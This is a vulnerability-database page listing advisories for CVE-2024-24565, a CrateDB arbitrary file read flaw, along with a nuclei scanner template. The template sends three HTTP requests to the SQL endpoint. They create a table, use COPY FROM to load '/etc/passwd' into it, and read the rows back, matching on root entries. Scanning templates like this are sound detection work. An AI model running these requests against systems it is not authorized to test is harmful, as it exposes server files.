Lucene search
+L

CrateDB Database - Arbitrary File Read

🗓️ 19 Aug 2026 04:15:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 121 Views

CrateDB Arbitrary File Read vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-24565
30 Jan 202415:47
circl
cnnvd
CNNVD
CrateDB Path Traversal Vulnerability
30 Jan 202400:00
cnnvd
cve
CVE
CVE-2024-24565
30 Jan 202416:46
cve
cvelist
Cvelist
CVE-2024-24565 CrateDB database has an arbitrary file read vulnerability
30 Jan 202416:46
cvelist
github
Github Security Blog
CrateDB database has an arbitrary file read vulnerability
30 Jan 202420:57
github
nvd
NVD
CVE-2024-24565
30 Jan 202417:15
nvd
osv
OSV
GHSA-475G-VJ6C-XF96 CrateDB database has an arbitrary file read vulnerability
30 Jan 202420:57
osv
prion
Prion
Information disclosure
30 Jan 202417:15
prion
ptsecurity
Positive Technologies
PT-2024-20456 · Cratedb · Cratedb
30 Jan 202400:00
ptsecurity
redhatcve
RedhatCVE
CVE-2024-24565
23 May 202509:38
redhatcve
Rows per page
id: CVE-2024-24565

info:
  name: CrateDB Database - Arbitrary File Read
  author: DhiyaneshDK
  severity: medium
  description: |
    CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
  impact: |
    Authenticated attackers can read arbitrary files on the server including sensitive configuration files and system files.
  remediation: |
    Update CrateDB to a version that addresses CVE-2024-24565.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-24565
    cwe-id: CWE-22
    epss-score: 0.03084
    epss-percentile: 0.86577
    cpe: cpe:2.3:a:cratedb:cratedb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cratedb
    product: cratedb
    fofa-query: title="CrateDB"
  tags: cve,cve2024,cratedb,lfi,exposure,intrusive,vuln

variables:
  table_name: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"}

      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"}

      - |
        POST /_sql?types HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"stmt":"SELECT * FROM {{table_name}} limit 100"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body_3)
          - "contains_all(header, 'application/json')"
          - "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"
        condition: and
# digest: 4a0a00473045022100ff303bfaab0d97e34edb2190ff6e01cc78b9231d1c98e108002490286f7619bf022078ed2381191446d6427d13505b435b6b3be0196797c31a9e1b567822f9830351:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.15.7 - 6.5
EPSS0.03084
SSVC
121